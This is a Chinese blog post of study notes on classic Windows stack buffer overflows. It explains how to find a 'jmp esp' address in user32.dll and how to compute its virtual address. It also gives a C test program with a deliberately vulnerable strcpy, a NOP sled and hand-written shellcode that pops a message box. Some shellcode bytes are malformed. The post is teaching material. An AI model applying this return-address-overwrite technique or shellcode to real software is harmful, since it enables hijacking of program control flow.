缓冲区溢出学习笔记

最新推荐文章于 2022-11-04 18:48:25 发布
最新推荐文章于 2022-11-04 18:48:25 发布
阅读量1.8k 收藏
点赞数
分类专栏: 网络安全 文章标签: user 汇编 windows c null
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fisher_jiang/article/details/2549192
版权

一:缓冲区溢出是指当计算机程序向缓冲区内填充的数据位数超过了缓冲区本身的容量,溢出的数据覆盖在合法数据上,我们使用精心设计的shellcode来覆盖合法的数据,从何使我们的shellcode得到执行。

缓冲区溢出堆栈原理图:

二:需要解决的几个小问题:

21缓冲区溢出后,用“jmp esp“指令地址覆盖原来的函数返回地址,执行jmp esp后,ip指针便指向缓冲区中我们的shellcode了,到哪去找“jmp esp“的地址呢?我们想到了windows的动态连接库user32.dll,我们在user32.dll中找一个“jmp esp“指令的地址不就行了吗.

22user32.dll载入ue,查找 FF E4,可能有人会问,你怎么知道jmp esp的机器码是FF E4?那好,我们来动手找出它来,编一个asm程序: 

#include<iostream>

using namespace std;

int main()

{

	 __asm

	 {

		 jmp esp;

		

	 }

 return 0;

}

在VC中进入调试,然后查出JMP ESP对应的机器码

23确定FF E4user32.dll中的偏移地址

231ue打开user32.dll查找FF E4,

232peditor r载入user32.dll,选择右侧的FLC,offset处填上我们用ue查出来FF E4在文件中的偏移量,peditor自动计算出FF E4virtual address,77 d2 74 47

嘿嘿~,偷懒的办法,你也可以自己动手计算。

233动手计算:Va=16847h+77D10000h+c00h=77D27447,原理图如下:

在我机子上是(77D5B0E0)

PEEDIT中可以查出.text段的Virtual offset1000h,Raw offset 400h,

1000h-400h=c00h,即文件被装入内存后增加的部分

三.解决了以上几个小问题后,结合缓冲区溢出堆栈原理图和一个本地溢出的程序,使用vc7.0反汇编调试一下,进一步动手实践。

给出我用来调试的程序: 

#include <string.h>

#include <stdio.h>

#include <windows.h>

#define JUMPESP "/x28/x59/xD8/x77"//user32.dll中jmp esp指令的偏移量

unsigned char eip[8] = JUMPESP; 

unsigned char sploit[] = 

{              

"/x60"         

"/x8B/xEC"        

"/x83/xEC/x54"      

"/x33/xC9"        

"/xC6/x45/xDB/x75" 

"/xC6/x45/xDC/x73"    

"/xC6/x45/xDD/x65"  

"/xC6/x45/xDE/x72"   

"/xC6/x45/xDF/x33"   

"/xC6/x45/xE0/x32"  

"/xC6/x45/xE7/x2E"    

"/xC6/x45/xE/x64"    

"/xC6/x45/xE9/x6C"   

"/xC6/x45/xEA/x6C"   

"/x88/x4D/xEB"       

"/x8D/x45/xDB"       

"/x50"            

"/xB8/x77/x1D/x80/x7C"  

"/xFF/xD0"          

"/x55"            

"/x51"            

"/x8B/xEC"          

"/x83/xEC/x54"       

"/x33/xC9"          

"/xC6/x45/xEC/x53"    

"/xC6/x45/xED/x75"    

"/xC6/x45/xEE/x63"    

"/xC6/x45/xEF/x63"    

"/xC6/x45/xF0/x65"    

"/xC6/x45/xF1/x73"    

"/xC6/x45/xF2/x73"   

"/x88/x4D/xF3"       

"/xC6/x45/xF4/x57"    

"/xC6/x45/xF5/x65"   

"/xC6/x45/xF6/x20"    

"/xC6/x45/xF7/x47"    

"/xC6/x45/xF8/x6F"   

"/xC6/x45/xF9/x74"   

"/xC6/x45/xFA/x20"   

"/xC6/x45/xFB/x49"  

"/xC6/x45/xFC/x74"   

"/xC6/x45/xFD/x21"    

"/x88/x4D/xFE"       

"/x51"            

"/x8D/x45/xEC"       

"/x50"            

"/x8D/x45/xF4"       

"/x50"            

"/x51"            

"/xB8/xEA/x04/xD5/x77"   

"/xFF/xD0"          

"/x33/xDB"         

"/x53"                                          

"/xB8/xA2/xCA/x81/x7C"   

"/xFF/xD0"          

"/x8B/xE5"          

"/x61"



};

int  MyCopy( char* str )

{

 char buff1[50];

 strcpy(buff1,str);

 return 1; 

}

int main()

{

HINSTANCE u32=NULL;

u32=LoadLibrary("user32.dll");

if(u32==NULL)

{

	 printf("cann't load user32.dll");

}

 char Buff[1024];

 memset(&Buff,0,sizeof(Buff));

 for(int i=0;i<56;Buff[i++]=0x90);

 strcpy(Buff+56,(char *)eip);//

 strcpy(Buff+60,(char *)sploit);//

 MyCopy(Buff);

 printf("/n successed /n");

 return 0;

}

调试步骤:

31vc7.0中按下 F11

32 在发生溢出的函数MyCopy那里下个断点(按下F9).

==================================================================

33    F11单步进入。

==================================================================

注意esp,ebp的变化

34 ret后就来到我们的shellcode了。

fisher_jiang
关注
专栏目录
缓冲区溢出漏洞(三):溢出报错的原因.
killcoco的小窝
04-09 841
第一次我们输入的只是‘abcdefgh’。因为要进入 main 函数,所以系统把之前的 EIP 和 EBP 保存在堆栈中,便于以后恢复;然后为‘output[8]’在堆栈中分配 8 个 char,拷贝‘abcdefgh’到其中。要注意的是,Windows 下堆栈的分配是高址往低址分配的,其结构如图 这样在执行完 main 函数后,只要把保存在堆栈中的 EBP、EIP 恢复
缓冲区溢出
penglaozi的专栏
11-13 3897
一、内存攻防技术 1. 缓冲区溢出 缓冲区溢出漏洞是程序由于缺乏对缓冲区边界条件检查而引起的一种异常行为,通常是程序向缓冲区中写数据,但内容超过了程序员设定的缓冲区边界,从而覆盖了相邻的内存区域,造成覆盖程序中的其他变量甚至影响控制流的敏感数据,造成程序的非预期行为。 eg: 如图所示,在内存中保存了相邻的两个变量,A是char[]字符串类型,作为缓冲区用于
关于缓冲区溢出
sonic1984的专栏
09-30 1035
Part 1 书评最近在看得一本书是《深入理解计算机系统》,英文原名是Computer System: A Programmer’s Perspective。也是一个偶然的机会才在别人的书桌上随便翻开看看的。结果一发不可收拾,现在自己花了RMB72购入囊中,列入珍藏的书目中了。正如英文的原名所叙述的,from a programmer’s perspective, 故名思义,就是从程序员的视角来看
【安全牛学习笔记缓冲区溢出
edu_aqniu的博客
10-30 830
数据与代码边界不清,导致程序执行代码 脚本: #! /bin/bash echo $1 在终端中运行脚本,参数写;或|加上命令,会被系统执行 • 源码审计  • 逆向工程 对编译后的文件反汇编 • 模糊测试  安装包,对程序发送数值,监视反馈 SLmail  安装后开放110,25,180,8376端口 Xp上添加smtp的25端口,pop3的
缓冲区溢出学习笔记1
young‘s blog
05-03 449
前几天无聊翻了翻百度网盘,发现有几节缓冲区溢出的课。点进去听了一下,还挺感兴趣的,然后就在自己电脑上实践了一下,做了第一节课的实验,在这里记录一下。 前期准备工作就是安装IDA pro 和 Ollydbg ,工具都是在吾爱破解论坛上找的,安装没遇到什么问题,就是和视频里工具的界面不太一样,问题不大,凭借我过人的才智,哈哈哈,不是很轻松的搞定了。 首先是写一个c语言小程序 #include &lt...
计算机系统基础之缓冲区溢出攻击实验
04-14
### 缓冲区溢出攻击实验知识点解析 #### 实验背景 缓冲区溢出是一种常见的安全漏洞,通过向固定长度的缓冲区写入超出其容量的数据来触发。这种攻击能够导致程序崩溃,甚至允许攻击者执行任意代码。《计算机系统基础...
划重点!关于缓冲区溢出攻击,这份防范策略一定要收好!
Hsuesh的博客
01-07 4400
缓冲区溢出是一种非常普遍、非常危险的漏洞,在各种操作系统、应用软件中广泛存在。利用缓冲区溢出攻击,可以导致程序运行失败、系统宕机、重新启动等后果。更为严重的是,可以利用它执行非授权指令,甚至可以取得系统特权,进而进行各种非法操作。
关于缓冲区溢出攻击(stack smashing attack)的学习笔记(一)
IdealForeverInHis19s的博客
12-05 1150
  最近写网络安全作业,研究了一下缓冲区溢出攻击的原理,实现过程。原理网上很多,这里就不在赘述了。 我的实验环境是虚拟机ubuntu 18.04.1 LTS,首先来看一段代码。 //bufoverflow.c #include&lt;stdio.h&gt; int main(int argc,char **argv){ char buf[10]; strcp...
OWASP WebGoat---安全测试学习笔记(五)---缓冲区溢出
某技术爱好者的专栏
05-23 3435
OWASP WebGoat---安全测试学习笔记(五)---缓冲区溢出
js文本溢出撑大格子_缓冲区溢出原理
weixin_39625468的博客
10-21 156
简单说下其原理:通过往程序的缓冲区写超出其长度的内容,造成缓冲区的溢出,从而破坏程序的堆栈,进而运行精心准备的指令,以达到攻击的目的。如上图,程序的缓冲区比作一个个格子(内存单元),每个格子中存放不同的东西,有的是命令,有的是数据,当程序需要接收用户数据,程序预先为之分配了4个格子(上图中黄色的0~3号格子)。按照程序设计,就是要求用户输入的数据不超过4个。而用户在输入数据时,假设输入了16个数据...
溢出专题……缓冲区溢出概念解析
luckycjs
03-09 1227
缓冲区溢出,在我看来可以界定为堆栈溢出。一个程序的运行所占用的内存空间分为三个部分(从内存地址的低端到高端分布): 程序段  :存放程序代码以及只读数据 数据段  :存放程序的静态变量,也就是常量 堆栈段  :函数内部的临时变量,函数调用,参数传递以及动态申请的空间,如为指针申请空间。基本上,缓冲区的溢出只(不知道这个词是否准确)发生在堆栈段。通常发生这个情况的可能是C语言中的字符
为什么会有缓冲区溢出攻击专栏
海枫的专栏
09-26 5536
已有一段时间没有写博客,今天打开博客收到网友的私信,问我是否从事与安全相关的工作,以及对从事安全工作有什么好的建议。今晚想借这个机会记录下我写此专栏的缘由。2014年整整一年,我成为部门的安全工程师,负责Linux系统的安全设计和加固工作,使产品满足公司、客户的安全要求。在此之前对安全没有任何经验,只有网络协议以及Linux开发的经验,因此这一年的工作遇到很多困难,这些困难有技术上的,也有管理上的。
面试题第一章[js内存溢出,js延迟加载,js缓存方式,cookie弊端,浏览器默认行为和冒泡,块级作用域,函数作用域,面向对象及三大特性,构造函数是否new,前端bug调试]
最新发布
桃桃雾的博客
11-04 203
作用域:ES5中没有块级作用域;ES6的块级作用域,任何一对花括号中的语句集都属于一个块,在这之中定义的所有变量在戴拿块外都是不可见的,我们称之为块级作用域函数作用域:函数作用域是针对局部变量来说的,在函数中定义的变量在函数外不能获取。
[BUUCTF]PWN——x_ctf_b0verfl0w(汇编代码写shellcode+jump esp指令劫持esp)
mcmuyanga的博客
02-04 1373
x_ctf_b0verfl0w 附件 步骤 例行检查,32位程序,开启了RELRO(不可改写got表) 本地试运行一下程序,看看大概的情况 32位ida载入 fgets可以溢出,但是只可以溢出0x32-0x20-0x4=14字节,由于没有开启nx,首先想到的是shellcode,0x20肯定放不进pwntools生成的shellcode,只能自己手写,但是得想办法劫持esp去执行我们的shellcode 在hit函数中找到了jump esp的gadget 因此我们可以构造这样的栈
软件安全实验——lab6(缓冲区溢出2:使用jmp esp或者call esp方法和修改函数指针)
Onlyone_1314的博客
07-30 1212
目录标题Task 1第一步:打开内存地址随机化第二步:编译上面的程序为Set-UID程序,注意加上-fno-stack-protector进行编译第三步:bof的返回地址第四步:确定缓冲区的位置第五步:返回地址和缓冲区之间的距离Task 2第一步:打开内存地址随机化第二步:编译上面的程序为Set-UID程序,注意加上-fno-stack-protector进行编译第三步:strcpy函数的返回地址第四步:hmm函数的地址第五步:攻击 Task 1 下面的程序具有缓冲区溢出,利用jmp esp或者call e
栈溢出利用-----jmp esp
qq_41683305的博客
02-14 1013
通过jmp esp利用栈溢出,首先我们要找出jmp esp 的地址,因为系统不同,通用jmp esp的地址可能不同,下面的代码是找出jmp esp的地址的: #include<windows.h> #include<iostream.h> #include<tchar.h> int main() { int nRetCode=0; bool we_load_i...
逆向之利用地址覆盖执行Shellcode
菜鸟-传奇
04-26 344
逆向之利用地址覆盖执行Shellcode Shellcode Shellcode定义   Shellcode实际是一段代码(也可以是填充数据),是用来发送到服务器利用特定漏洞的代码一般可以获取权限。 Shellcode的作用   Shellcode一般是作为数据发送给受攻击服务器的。Shellcode是溢出程序和蠕虫病毒的核心提到它自然就会和漏洞联想在一起。漏洞利用中最关键的是Shel...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值